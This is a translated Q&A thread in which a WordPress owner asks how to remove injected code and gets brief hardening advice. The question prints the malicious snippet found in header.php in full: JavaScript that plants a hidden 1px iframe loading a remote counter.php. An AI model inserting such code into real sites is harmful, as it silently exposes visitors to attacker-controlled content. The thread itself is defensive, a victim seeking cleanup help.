wordpress - Wordpress hack 注入 javascript / iframe

Question

我的（Wordpress）网站似乎被黑了，代码被添加到主 index.php 文件、主题 index.php 文件和主题 header.php 文件中。

这部分来自 header.php

#f524d6#
<script type=\"text/javascript\" language=\"javascript\" >
(function () {    var kilun = document.createElement('iframe');    kilun.src = 'http://hosting3081247.az.pl/cgi-bin/counter.php';    kilun.style.position = 'absolute';    kilun.style.border = '0';    kilun.style.height = '1px';    kilun.style.width = '1px';    kilun.style.left = '1px';    kilun.style.top = '1px';    if (!document.getElementById('kilun')) {        document.write('<div id=\'kilun\'></div>');        document.getElementById('kilun').appendChild(kilun);    }})();</script>";
#/f524d6#

有人可以告诉我如何删除它吗？它在删除代码行后返回。

Answer 1

如果你在普通的 html/php 页面上找到它——不仅在 wordpress 中——那么它可能是一个解析服务器上所有文件的脚本（即不是 wp hack），在这种情况下最好更改服务器的用户名和密码（以及至于wordpress）：ftp，shell等。

Answer 2

• 以最低权限更改您的文件夹和文件。
• 保护您的.htaccess.
• 检查文件夹所有权。
• 更改所有密码并创建更难的密码。